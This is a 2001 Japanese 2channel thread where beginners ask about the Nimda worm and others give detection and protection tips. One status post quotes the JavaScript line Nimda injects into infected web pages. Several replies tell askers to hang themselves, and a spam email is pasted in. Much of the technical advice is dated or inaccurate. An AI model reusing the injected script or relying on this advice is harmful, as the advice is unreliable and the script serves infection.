スーパー初心者のためのＭＳＮウイルスすれ。

専門用語飛び交いすぎです。
「・・・・のワクチン、買っていれとけ！！！」とか、
初心者でも出来る対策を簡単な言葉で教えていただけたらと・・・。

感染ファイルってどうやって検索すればいいの？

よろしく

>>5　ありがとう

感染していないなーと思ったらＳＰ２をダウンロード
すればよい。感染してるなーと思ったら回線切ってそ
れで首つろうＹＯ！

IE5.5なら大丈夫だよね？
他のサイト見に行っても大丈夫?

sage

初心者はパソコンの電源切って、
おとなしく寝ててください

世知辛い世の中だね。

小難しくてわかんねーからもっと
丁寧に教えやがれ、という趣旨のスレを立てる１

ノートンのワクチン入れとけば大丈夫ですよね。

hotmailのサイトは？

>>5
聞く前にトップに書いてあるリンクの情報を読もうとは思わないのかい？

W32.Nimda.A@mm、とりあえずの対策（気休め）

・まず感染の確認
その1：readme.exeやreadme.eml、MEP*.TMP.EXEで検索をかける（ローカルハードドライブを選択すること）
なお、readme.exeでWAVファイルみたいになっているものもワーム。
また、OutlookExpress系のメーラーでは送受信メールの拡張子が*.emlなので、
emlが出たからと言って必ずしも感染しているとは限らない。

その2：Cドライブがネットワーク共有を勝手にされていたら感染している

その3：システムがスローダウン、いつもよりも明らかに遅く、しかもやたらネットにアクセスしまくる場合も感染している疑い濃厚。

・対処法
現在のところ不明。
感染ファイルを削除しても、既に正当なWindows DLLとRICHED20.DLLを置き換えているのでムダ。
また、感染後にIE5.5SP2などにしても意味なし。

・感染している場合
レジストリの
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
以下にある実行ファイルに感染している。

・自己防衛法
IE5.5SP1かSP2にバージョンアップする（ただしダウンロードに非常に時間がかかる）
JavaScriptをOFFにしておく（直接リンクしてしまった場合はやはり実行されてしまうので注意）
あやしげなメールが来ても開かない（README.EXEという添付ファイルは絶対にクリックしない）
駆除ツールを使う（まだ出てない…）
NetscapeNavigatorにする（何か間違ってる…）

http://www.interq.or.jp/sun/miyaji/gbbshp/gbbs20/img/210.jpg

自分が借りてるWebサーバの自分のページが大丈夫かどうかは、
どうやって確認するんでしょうか。

IE5.0、5,5って無縁の話されてもなあ。
それよりIE4.0で感染するのかどうか知りたいんだけど。

>>13
読んだってわからないんじゃないか。
あんたのいうことはもっともだが。

>>17
Microsoft ではもう確認もせず、情報も出さない惧れあり。
善意で検証してくれる人がいないと分かりません。
＃時間と機材があれば、自分でやるのは難しくないのですが…

hotmailって、MSNだけど行ったらやばいのかな？

パソコン屋へいったら？
金はとられるが、それが一番確実。

本スレ読んでてもわからないなら、
ネットつながない方がいいだろ。

検索したら10000個のファイルが見つかりましたって出たぞ
そしてもう一度検索してみたら０個だった
どゆこと？？？

頒布←これなんて読むの？

漏れの友人も大騒ぎしてる
自分で調べもせずに次から次へと・・・
分からないからって逆切れすんなよ( ﾟДﾟ)ｺﾞﾙｧ!
ウイルス定義の更新すらしてないような厨房はネット繋ぐな、迷惑だ。

>>24
>頒布←これなんて読むの？
読み方はフブじゃないの？
たくさん複製して世間に広く分け与えることじゃないの？

>>24
辞書で調べれ
意味まで出てくるぞ
http://dictionary.goo.ne.jp/cgi-bin/jp-top.cgi
はんぷ 【頒布】

（名）スル
配って広く行きわたらせること。「小冊子を―する」

>>25
わたし、貧乏だから
みんなが装備しているような
ワクチンソフトを持っていない。
打つだし脳。
気休めかもしれないが
ここに無料のワクチンソフトがあるよ。
http://www.interc.ne.jp/index.html
無いよりもあったほうがまし。

ネットスケープの4.7使ってるんだけど、これは平気なの？

初心者質問スマソ

なんでＭＳＮウィルスって呼ばれてるの?
ＭＳＮが感染に荷担したの？

MSNのトップがやられたから

ワクチンを買ってインストールせよ。

私自身に危険はないんでしょうか？
そういえば、頭が重い気がします。
病院に逝くべきでしょうか

W32.Nimda.A@mm、とりあえずの対策（必要条件）

２ちゃんなんて見てないで、皆のためにも
とっとと回線切って首吊れ

つーかお前ら割れ使ってるからファイル更新出来ないだろ　プ

意味わからん

>>35
割れでも更新できますが、何科？

SP2とかってどこで見るのよ?
俺のIE5.5は「バージョン:5.50.4134.0600」ってなってるけど、
これは大丈夫な奴なのかい?

わかんないからおしえて

よくわからんのやったらデータセーブして再インストール
後に雑誌に付いてるCD-ROMでアップグレード

更新バージョン：SP2
ってなってればSP2

MSのところにあった。俺のはただの5.5だった。鬱。

5.50.4134.0600 Internet Explorer 5.5
5.50.4308.2900 Internet Explorer 5.5 Advanced Security Privacy Beta
5.50.4134.0100 Windows Me (4.90.3000)

http://www.microsoft.com/japan/support/kb/articles/JP164/5/39.htm

ニュースサイトは、安全IEなバージョンを報道するのみで
ワームの動作を防止するためのJavaScriptを切るなどの対処法を
全く説明しないゾ。
やはりウェブ系報道機関は、他の報道機関が報じた記事や
当事者の公式発表をコピペして垂れ流すだけか。

ＩＥ５．００ってやばいすか？
ＳＰ２って書いてあるんすけど

どいつもこいつもエロサイト行って勉強してこい。
って思った。
１回eroxにでも泣かされて来い。

5.5SP2やっとDL完了・・３０分かかったよん

ワーム＝虫ってどういうことですか？

マイクロソフトのサポートセンターに電話してください

>46
オレは３時間かかったよ（泣きﾜﾗ

アップデートしただけなのに、デフォルトのブラウザが
ネスケからIEに勝手に変わってた。

>>33
狂牛病だろ

5.5SP1でも感染するらしい

どなたか、お教えください。
フリーのタブブラウザを使っているんですが、
Java切っとけば大丈夫なんでしょうか？
ちなみに、Moon Browserです。

Dear E-Commerce professional ; This letter was specially
selected to be sent to you . If you are not interested
in our publications and wish to be removed from our
lists, simply do NOT respond and ignore this mail !
This mail is being sent in compliance with Senate bill
2416 , Title 8 , Section 305 . This is not multi-level
marketing ! Why work for somebody else when you can
become rich within 97 months ! Have you ever noticed
the baby boomers are more demanding than their parents
and the baby boomers are more demanding than their
parents . Well, now is your chance to capitalize on
this ! WE will help YOU sell more and process your
orders within seconds ! You can begin at absolutely
no cost to you ! But don't believe us ! Prof Anderson
of Colorado tried us and says "Now I'm rich, Rich,
RICH" ! We are licensed to operate in all states .
If not for you then for your LOVED ONES - act now !
Sign up a friend and you'll get a discount of 80% !
Best regards !

>>42
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm
こちらのページも参考にするとよいかも
SP2及びIE6のバージョンまで網羅してあるよ

メモリが少ないのでｱﾌﾟﾃﾞｰﾀできないのですが
２ちゃん以外はどこにもいかなければいいのですか？

すげーなお前ら、よくそんなんで２ちゃんねるなんかこれるな、
どうせファイアーウォールなんかいれてないんだろ、クッキー
もOKで情報垂れ流してんだろ、JAVAもきってないんだろ、
もしかしたらこれも何いってるかわからんやついる？

ＩＥ５．５ＳＰ２　なんだけど
システム全体のスキャンかけたらW32.Nimda.A@mmを検出して削除しました。
とりあえず大丈夫なんだけど原因がわかりません。
考えられる感染原因を教えてください。
マジでマジレスを希望します。

つーか、ie5setup.exeは落としたけど、
IE5.5SP2自体が実はウィルスだったという可能性もあるから
インストールはしないでおくよ。

Internet Explorer 6 をダウンロードしちゃえば問題無いよ

　http://www.microsoft.com/windows/ie_intl/ja/

色々アップデートしたら、
アドレスのhttp://の左側にあるマーク（紙の上にeの文字）
の色が水色っぽく変わった
みんなもそうなの？

ニュース版の上のリンクSP1やんけ

>>56
ﾜﾗﾀﾖ

>>57
その通りですが、なにか？

>>57
javaとjavascriptの区別ついてねーだろ

>もしかしたらこれも何いってるかわからんやついる？
言ってる事は判るけど面倒で何もやってねぇ。
やべーかな、やっぱ・・・。

>>58
感染経路が複数あります、IE5.5SP2は感染サイトを参照しても自動的に感染しないというだけです。
共有ドライブがある、IISを導入している・・・・
OSの種類やバージョンを書いてみれ。

東スポではこのウィルスもラディンのせいにしているよ（藁

>>61
紛れもなくウイルスに感染した証拠です。

幹線の疑いのある奴ら、
とりあえずここ逝ってオンラインスキャンしてこい
●トレンドマイクロ　オンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp

削除は出来ないから、このワームが検出されたら
1. アンチウィルスソフト買って、サポセン併設の
　パソコン屋で事情を説明して、アップデータを落としてもらう＜有償
2. 金が無いのならシステム再セットアップ
3. 嫌だというのなら回線切って首を吊る

マジの話なんだよ。
原因がわからん。
誰か教えて。

ファイヤーウォールまんせ〜〜！(ｹﾞﾗ

東スポはPCではなく、記者の頭にウィルスが感染したようだな。

ま、売るためだ。煽りは藁ってすまそう。

>>60
別の意味で問題だらけだったりして

(´ー｀)。ｏＯ（ウィルス怖いね）

>>57
ファイアーウォールいれてればいいんですか？
クッキーって情報垂れ流すんですか？

状況報告ver1.02(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
　→java関連とダウンロードのファイルのダウンロードを不許可。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav（音声）ファイルになりすます。

LANによる感染
　社内に一人でも対策してないひとがいてノーパスとかにしていた場合
　LANの共有フォルダを使っても自己増殖する。

東スポ曰く、
このウイルスはラディンが仕掛けた物でコンピュータを狂わせて核ミサイルを発射させる事も可能。
このウイルスは第３次世界大戦の幕開けだ。
ラディン達は世界中のコンピュータを自由に操る事が出来ると言うのか。

…らしいです。
ま、いっかぁ東スポだし。

状況報告ver1.02(後編)
感染の有無の確認
1.●トレンドマイクロ　オンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
　*.emlが大量にHITした際は確定。
　ただし、それが以前に自分の書いた見覚えのあるメールだったら、
　それはウイルスではない。
　そうでないときは後者2個を削除して様子を見る。
　ファイルのDLを拒否してもファイルが作成されたという報告があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする。


感染時の対応
　感染してしまった後は、アップデートしても無意味。
　とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。

　ワクチンできたよとかの情報など、追加のフォローさらに宜しく！＞ALL

>>24
私、間違えていた。

はんぷ 【頒布】

（名）スル
配って広く行きわたらせること。「小冊子を―する」

>>78
omosiroi!

>>61
>色々アップデートしたら、
>アドレスのhttp://の左側にあるマーク（紙の上にeの文字）
>の色が水色っぽく変わった
>みんなもそうなの？

InternetExproler6の特徴だよ。

クッキーてそんなやばいのか？
２ｃｈに書けないからオンにしてるんだけど

あのぉ、、、
ドリームキャストは感染しませんよね？
少し心配です。

なんだか、よくわからないから２ｃｈから外にでないように
してよっと

漏れザウルスだけど感染しそうで怖い！

>>84
　ドリキャスは、性能がアレな代わりにウイルスには強いよ。
　なんせまともな記憶媒体が内部RAMとVMしかないから……
　OSすら起動のたびにGDから読み取りだし

>>87
ありがとうございます。
安心しました。

ドリキャスマンセー！
（半角カタカナ打てません）

>>83

ZDNNでcookie、悪用で検索してみ　あとウェブバグも
でもあそこはソフトバンクだからそれで儲けてる側で
ちょっとしか取りあげてないけど

>>88
（ｗｗ

16日に中国からのウイルス攻撃は予想されていたんですね。

あとここのページもウェブバグが検出されてて
どうやら追跡されてるようです
Bugnosis analysis of: ニュース速報＠2ch掲示板 (http://news.2ch.net/news/#5)

Highlighted images may be Web bugs.
Properties Contact Image URL
Tiny, Once, Domain http://f1.aaacafe.ne.jp/~starplan/newsrogo.gif

Property name Description

--------------------------------------------------------------------------------

Tiny image is tiny, so is probably not meant to be seen
Protocols image URL contains more than one Web protocol name (e.g., "http:" twice)
Cookie image URL overlaps with the cookie field too much
Lengthy image URL is unusually long
Domain image comes from a different domain than the main document
Once image is used only once in the document
TPCookie image comes from a different domain than the document and manipulates a cookie (Third Party Cookie)
Recognized compares the URL against a set of recognized Web sites

--------------------------------------------------------------------------------


Copyright © 2000, 2001 Privacy Foundation. All rights reserved.
Right-click in this window to configure Bugnosis.
Help / Readme File (on this computer)
Bugnosis Web site

きゃはは　ネットはブッ壊れてもいいパソコンでやってたからいいかも

ってかファイルとか消えないなら問題無いや

>>92
>Bugnosis analysis of: ニュース速報＠2ch掲示板
> (http://news.2ch.net/news/#5)

ここが意味不明

つーか、東スポ煽りすぎ（ｗ
あの記事見たら素人は滅茶苦茶ビビるぞ（ｗ

よくわからんが、
＞2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
ちゅうことなら、２ｃｈのサーバもやばいんでは？
２ｃｈだけみてれば安心、というわけにはいかないのでは？

僕のPC内のエロ画像もラディンに見られちゃいますか？

>>96
　対策がちゃんとしている鯖は安心だけど
とりあえずウイルスの中身がまだ完全にわかっていないようなので
ここも過信はしない方がいいと思う

スーパーピンチ

AAずれますよね？5.5　6.0は

>>98
２ｃｈみるにしても、IE5.5 sp2かIE6にしておけ！！
っちゅうことですかね？

そういえば、IE6の最新バージョンってどっかの雑誌の付録にもうついてます？

ネットから落とすとウン時間かかりそうなので・・・

5.1のSP2ならAAずれねぇし安全だぜ。多分。

IEからネスケに乗り換えれば安全なの？

>>101
それ以外は即逝く
あと、JavaScriptもきっといたほうが良いね。

>>100
僕、今さっき5.5のＳＰ２にしたんだけど
ずれないんだよね、、、なんでだろ？

ちなみに、かちゅ〜しゃで見てます。

>>102
IE6の正式版が出たというデマが
ニュース速報板で数日前に流れたけれども
現在もテストバージョンしか出ていないので
サーバーからダウンロードするしかない。

MAC使ってるよ。
ウイルスうらやましい。

>>104
おれはネスケのことは、ようしらんが、
大丈夫みたいYO

>>104
>IEからネスケに乗り換えれば安全なの？
２ちゃんの話によるとそうらしいね。
でも、本当かどうか知らない。

>>106
カチュ〜シャは関係ないだろ。

>>108
昔は MAC のウイルスって結構あったけど、いまはウイルスあっても流通させるマシンがないよね。

>>111
んじゃ、タブブラウザは安全なの？

>>110
ただ、メールで送られてきたり、職場などの、
ネットワークで送られてきたら、対応しようがない。

http://www.microsoft.com/windows/ie_intl/ja/download/default.htm

ここまできたらはづかしついでにききます。
JavaScript切るのって、
「セキュリティ」「レベルのカスタマイズ」「セキュリティの設定」の
「Javaアプレットのスクリプト」を無効にすればいいんだよね？

JavaアプレットのスクリプトってJavaScriptとは実は違うもののような気が
してならないんだけど・・・

>>104
　寝輔でも即死しないだけで、直リンでファイル踏まされると
DLダイアログは出るはずだからちゃんと拒否してねん

>>111
ああフォントの話か。

Nimdaを逆さから読むと、admin。
adiminからadministratorという言葉が容易に連想できる。
administratorとは、管理者。
このことから、感染したPCをウイルス開発者が管理するスクリプトがウイルスに含まれている事は明白である。

AAずれる人は
ツール->インタネットオプション->全般->フォント->Webページフォント
これをMS PゴシックからMS ゴシックに変更して

>>104
今乗り換えるなら、モジラの方がいい。

>>116
違うよ。
この際だから、両方オフでね。
ついでにダウンロードも無効にしておきましょう

>>113
かちゅしゃはよくわかんねぇYO！！
ブラウザが開くの？

admin 2 3w

東スポを今から買ってくるよ

>>116
超初心者向けで作ったから、JAVAとjavaの違い説明するの面倒だったのよ。

>>96
> ちゅうことなら、２ｃｈのサーバもやばいんでは？
さすがに Windows をサーバーに使ってはいないでしょう
から、2ch に感染ということはなさそう。

まとめてくれ！

>>107
アータがデマだ。正式版はもう出た。
ココを読め。
http://yasai.2ch.net/test/read.cgi?bbs=win&key=1000671972

IE5.0SP2　は危険かな？

>>129
Windows UPDATE や、 IE6のダウンロードファイルに、なにか仕掛けがあったらスゴいけど

>>112
どうも。
ということは、その下の
「アクティブスクリプト」と「スクリプトの貼り付け処理の許可」
かな？

ダウンロードは「ファイルのダウンロード」だってのはわかりました。

>>130
　即死は無し。
　だけど覚えの無いDLダイアログが開くことあるからそれを拒否して。

>>130
問題なしです。
もし前のほうのスレでワシの書き込みを読んで判断されてるようなら申し訳ない。

ネスケなら問題ないんですか？

ＳＰ２のインストールが途中で止まったりして上手く行かない人へ

１．最小構成インストール、又はブラウザのカスタマイズ（Ｃ）
を選ぶ。

２．次の画面の右下のボタン「詳細設定」を押して、「ダウンロードのみ」
を選ぶ。

３．ダウンロードが終わったら、すぐにインストールせずに、
ＰＣをセーフモードで再起動

４．セーフモードで起動した状態でインストール

これでインストールできます。

リロードすると訳のわからない文字が出てくるのですが・・・

>>133 >>134
有難う御座います　気をつけます！

あと申し訳なくないです
前の方のスレ読んで色々チェックしたりできたので
とても感謝してます〜

てすと

>>137
メニューバーの「表示」→「エンコード」以下で「日本語（自動認識）」が選択されてる？

なんか仲間外れにされた気分・・・・・・

テロ募金のクリックしたらおみやげもらっちゃいました
打つだし脳

てすと

ところでひろゆき顔出さないけど
なんか対応早いな！

>>141
　俺は仲間はずれになりたかったよ(苦藁

# 以下初心者の方にはお勧めできない内容です

>>141
VMwareとかを入れて仮想Windowsマシンを作れば擬似的にウイルスに感染させられるぞ。
ただ、使い方を誤ると本来のマシンのほうに影響が及んでしまうかもしれないのと、
ネットワーク上にバラまくと迷惑なので注意。

>>144
２ちゃんねるのWebサーバはapacheなので今回のトラブルとは全く無関係ですよ。

>>140
自動認識になってますが・・・
書き込みが終わった後にも変な文字が・・・

鉄壁は対応した。
ウイルス定義ファイルダウソ
http://www.sourcenext.com/download/tepeki/dat_win.html

>>129
まだ、正式版は出ていないよ。

でたよ Ie6！ 〜バージョン３〜
http://yasai.2ch.net/test/read.cgi?bbs=win&key=1000671972

33 名前：Name 投稿日：01/09/17 18:50
マイクロソフト株式会社にメールで問い合わせたところ、現在皆さんがダウンロードされているファイルが正式版では無いことが判明致しました。
社内で動作テスト中の最新版だそうです。
正式版の公開は、Windows xp 前後を予定しているらしいです。

ｎａｎａｓｉｓａｎはこちらにもいらしたんですね！

お疲れさまです。がんばってください！

>>148
それってインストールがうまくいっていないのでは？
ちなみにインストールしたIEのバージョンは？

よくわからないからIE6をインストールした。
５．５とかあるけど数字が大きい方がいいんでしょ？

>>148
　そのうちいきなり直ったり、再起動後に直ってたりするから、
面倒でもエンコード→日本語(自動選択)の方で我慢

>>145
146の方法でおいらも感染してみるよ！
HDDを分けっこして、macdowsマシン誕生！！

>>150
あんたそんなカキコ信じてどうするよ。
そんなんじゃ2ch生きていけないぞ。
それからもっと下の方まで読んでくれ。

msnなんてみてるのは初心者かＤＱＮの証拠。
設定の仕方を知らないだけ。
あんな、偏った編集方針のＨＰを喜んでみているヤツは国賊。

>>136
ありがとーありがトー多謝です。
今日一日があなたにとって幸せでありますように

>>153
大きいマンセー

IPA意外とわかりやすいかも↓

http://www.ipa.go.jp/security/topics/newvirus/nimda.html

おしえてくださ〜い！！
CドライブをWAVで検索したらWAVが出てきたんだけど、これって感染してますか？
よろしくお願いします！！

>>157
WindowsユーザーならIEでMSNが常識だ！！
百歩譲ってyahoo japan！

２ちゃんは大丈夫なんかな？

>>161
　WAVはWINの音声データ形式。
　それは見つからん方が珍しいから安心して。

は？

>>161
実行してみ

>>162
ブラウザ起動直後にいきなりインターネット上のページが見えてしまうのは、それはそれで不便でない？
俺だけかな、lynxでもw3mでもmozillaでもIEでもホームページをブランクページにしてるのは(^^;

俺のＩＤがＦＦ９だ！

msnなんて行ったことないかも･･
何なの?検索エンジン?

>>167
ネタでし

>>168
FF・ドラクエ板1名様ご案内〜

IE６って５．５よりもかなり重いんですか？

非力なパソコンなんでそれが心配。

>>158
(*^-^*)/

>>169
"Microsoft Network" の略。IEではデフォルトのページがmsnになっている。

>>172
5.5とは大して違わないと思う。機能的にもあまり変わってないし。

こんなＭＳＮ厨房がいるからウイルスが流行するわけだな。
http://yasai.2ch.net/test/read.cgi?bbs=win&key=998723304&ls=50

　今回のウイルスはIEがMSNのHPとセット商法みたいなことしてたせいで
被害の拡大がひどすぎるなやぁ……

>>152再インストールしたら解決しました。ありがとうございました。

>>169
なに！！！！
貴様はネットスケープナビゲーターの工作員だな！！！
MSNを知らないなんて、厨房認定！
回線切って、焼くのを失敗したCD-Rを投げて遊べ！！

http://www.microsoft.com/japan/ie/
かっこよくなっている。

>>164､>>166
そうですか、安心しました。音声ファイルだったんですね。
ありがとうございました！

MAC使ってるよ。
僕もみんなとワイワイしたいよ。

水原優君結婚して

>>181
エミュレ−タ−でマックをwinにしる！！
感染体験(ﾟдﾟ)ｳﾏｰ

W32.Nimda.A@mm、とりあえずの対策（気休め）
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000321.htm

W32.Nimda.A@mmについてあれこれ
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000323.htm

ここが一番うじゃうじゃ情報集まってる、
http://keisui.com/GIGAZINE/cgi-bin/news/html/newsbav.html

ドリキャスはどうなの？

>>178
そんなの知らなくていいよ。
この事件でｍｓｎは厨房管理さらけだしたんだから。
どうせ、バグで脆弱だったんだろ。

ネスケはマヂで使い物にならん

なんか2chの読み込み重いんだけど
こいつの影響もあるのかな

たびたびすみません・・・。
設定ファイルでWAVEmixっていうのがあるんですが、これは感染しているんでしょうか？

>>185
Dreamcastの人はプログラムが動作できる環境ではないので問題は発生しません。

>>174
メーカー製のマシンは、初期ページがメーカー向いています。

>>185
　ガイシュツ。
　200ないスレなんだからとりあえず目を通す努力してくれ。
　説明面倒だからとりあえず安心しとき。

>>191
あなたのレスがデジャブだ・・・
ゴミレスすまん

質問！ＯＳが借り物の場合、ダウンしたらヤバイですか？

>>189
それはウイルスとは無関係。必要なければ消してしまってもかまわないが、
何かのアプリケーション設定が消えてしまうかもしれないので注意。

>>194
ﾔｳﾞｧｲ以前の問題。

>>189
　とりあえずここではWAVEから離れんしゃい。
　WAV関連はメールの添付ファイル以外は今回関係ないよ

で、結局検索でreadme.exeがあったら感染なのか？

>>189
そんなに心配なら↓をお気に入りに入れておくよろし
http://www.trendmicro.co.jp/hcall/scan.htm

>>195
ありがとう！安心しました〜。
これからもっと勉強をして詳しくなります。お世話さまでした！

>>198
　キャッシュにあるだけかもしれないから、それで確定じゃないよ。
　*.emlが大量にHITしたら確定って考えていいと思う。

>201
さんくす、2個しか*.emlは見つからなかった
感染はしていないみたいだ

IE5.0、CPUはペンティアム166、メモリ96。
この非力なパソコンにはどのIEを入れればいいですか？

ageだ、ホレ

ＳＰ２をインストール＆再起動し、バージョンがＳＰ２になったのに
Temporary Internet Filesを検索したら、[email protected]というのが出てきました。
これは、まだ感染しているということですか？

うちのパソコンにもウイルスいるよ。
名前はVBS.Haptime.A@mmつて奴。
いい感じに共存してるけどそろそろ手を切りたいな〜。
誰か教えてください（泣

状況報告ver1.03(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
　→java関連とダウンロードのファイルのダウンロードを不許可。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav（音声）ファイルになりすます。

LANによる感染
　社内に一人でも対策してないひとがいてノーパスとかにしていた場合
　LANの共有フォルダを使っても自己増殖する。

感染鯖
　ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。

状況報告ver1.03(後編)
感染の有無の確認
1.●トレンドマイクロ　オンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
　*.emlが大量にHITした際は確定。
　ただし、それが以前に自分の書いた見覚えのあるメールだったら、
　それはウイルスではない。
　そうでないときは後者2個を削除して様子を見る。
　ファイルのDLを拒否してもファイルが作成されたという報告があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
　感染してしまった後は、アップデートしても無意味。
　とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。

　ワクチンできたよとかの情報など、追加のフォローさらに宜しく！＞ALL

IE4のSP2を使っているのですが、安全ですか？
HDの余りも限られているし、OSも98(SEではない)
なので、できればIE5にはしたくないのですが。

>>206
共存ってなんか笑えるね

＞2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT

スタートから検索を選んでＣドライブを検索するだけでいいのですか？

>>208
そこから、直リンできんって・・・
ネスケの人もいるんだから
http://www.trendmicro.co.jp/hcall/scan.htm
にしときんさい

>>209
　即死はないけど、直接ウイルスのファイルを踏まされると
DLダイアログが開くから拒否して

>>212
　あ、悪いっす＆了解。
　変更しときます。

ぷくくくく、ぎゃははは。
ブラウザをあっぷでーとしたらウイルスが消えると思ってる天才くんがいるようだね。あはっはははは。最高!ネタだろ?

>>213
どうもありがとうございます。
気をつけますです。

今さっき１時間かけて５．０→５．５SP2に変えたけど
軽くなったよ
嬉しい

>>215

何か？

>>211
　DL先の設定をDドライブとかにわざわざしていないなら、CだけでOK。

＞うちのパソコンにもウイルスいるよ。
名前はVBS.Haptime.A@mmつて奴。
いい感じに共存してるけどそろそろ手を切りたいな〜。
誰か教えてください（泣

いや、マジで。
検索したら殺リ方のってたけどよくわからんです。

>>219
ありがとうございます

>>220
さっさとウイルス対策ソフト買え・・・
（鉄壁とマカフィー以外の）

>>220
　詳しくないならかえってまずいことになるので自分で直接ファイルを
いじらないでとりあえず、駆除できるウイルススキャンソフト購入するか、
OSをバックアップorセットアップから復帰しなおすしかないね。
　今後もウイルスもらうこともあるかもしれないから、
ウイルススキャンソフト買う方がいろいろとお勧め。

>>215
君はここのスレの題名が読めないのかしら？
スーパー初心者のためのＭＳＮウィルスすれ。
あ、漢字読めないの？
すーぱーしょしんしゃのためのえむえすえぬすれ。

とりあえず。みんな落ち着け。

今回のウイルスはそんなに怖くないぞ。

ｽｸﾘﾌﾟﾄの実行さえ切っておけば、とりあえずWeb閲覧だけでは
感染しないから。

慌ててIEのﾊﾞｰｼﾞｮﾝあげなくても大丈夫だ。

age

msnのサーバがやられたのですか？
んなら、hotmailのメールは、
それに感染しているということもありえるのですか？

Internet Explorer 6 ならいいの？

俺的にはサーカムのほうがいやだったけどね。
再起動できなくなったし。

msn訴えると僕は金持ちになれましゅか？

>>224

それだと、 msn の質問ばかりになるんだろうな・・・

>>230
アメリカで訴えろ！
懲罰的損害賠償(ﾟдﾟ)ｳﾏｰだ

>>215
自分の作ったスレ↓が人気無いからここに来たんだろ（ﾜﾗ
http://news.2ch.net/test/read.cgi?bbs=news&key=1000876455

★☆「ノーブル・テッシー」（高貴なテッシー）作戦決行中！！☆★
21世紀偉人投票所：http://isweb35.infoseek.co.jp/diary/kouki711/

何か朝起きてPC起動したら、いつもより遅いんですけど、
それにネットなんか滅茶苦茶遅いし。。。

ノートンつかってるんだけど、
VBSってのがいるよ！！と警告されて
完全ウイルススキャンしたんだけど引っかかってくれないのです。
なんかよくわかんないんだけど、設定とかが悪いのかな？

ファイルのダウンードってウインドウが出たんだけど？？

MSNスレじゃねーわ！！
孫の代まで氏ね！

SP2のインストールめんどくせぇや
ジャバスクリプトきっとけば大丈夫？

ｽｸﾘﾌﾟﾄの実行を切るってどうやるの？

>>237
それはMSNウイルス対応済みのIEでMSNウイルスに感染したサイトを開いたときに
表示される。ダウンロードを始めてもいないのにウインドウが表示されるようなら、
キャンセルを押して閉じると良い。

>>235
そうです。このウィルスのせいでネットは大混乱、テレホタイムでもないのに激重です。

>>240
ﾃﾞｽｸﾄｯﾌﾟのIEのｱｲｺﾝを右ｸﾘｯｸ
↓
ﾌﾟﾛﾊﾟﾃｨを選択
↓
表示された画面の「ｾｷｭﾘﾃｨ」TABを選択
↓
ｾｷｭﾘﾃｨﾚﾍﾞﾙの「ｶｽﾀﾑ」を選択し「設定ﾎﾞﾀﾝ」を押す
↓
下のほうにｽｸﾘﾌﾟﾄの設定があるから「有効にする」を「無効にする」に変更

IEのﾊﾞｰｼﾞｮﾝによっては設定の場所が違うかも。

とりあえず、ｽｸﾘﾌﾟﾄを切れば、Webからの感染は防げる。

２ｃｈにも初心者がたくさんきているのだと知った
今日この頃。

Internet Explorer 6 にアップデートしたんだが
大丈夫ですか?

>>243
ﾏｼﾞありがとうございます！

>>242
なんだ、ﾋﾞｸｰﾘした！自分も感染してるんじゃないかと思ったよ。

age

>>248 鬱氏。age

>>245
いちおう正式公開されたので大丈夫のはず。
ただ別のウイルス（ワーム）に引っかかる可能性が捨てきれないので、
これからも随時アップデート情報を追いかけておきましょう。

スレッド一覧クリックしたら、
文字化けしたぞ！！！！
おれだけか？？？

どうにかこうにかやってみたのですが、
４５分ほどかかるというので、ちょっと目を離していたら
「（なんたらかんたら）へのアクセスはできませんでした」とかって
なっててわけがわかりません。

もう一度このスレをゆっくり読んでやり直そうと思ったら
（たぶん、途中でダメだったのだろう、と思って）
今度は選択できる一覧からＰＳ２がなくて・・・・

で、インストールの履歴を見たら
『　Internet Explorer 5.5 Service Pack 2 と
　インターネット ツール - version 5,50,4807,2300 - の
　インストールが完了しました。
　13:39:59 2001年9月19日 : 4795 』

となってるんです。
これはできてるってことですか？
私のＰＣはもう大丈夫ですか？
どなたか教えてください。

ワイドショーで取り上げられてた
W23　NIMDA　ってウイルスがこれか？
世界大戦３　行政機関って意味だとかいって
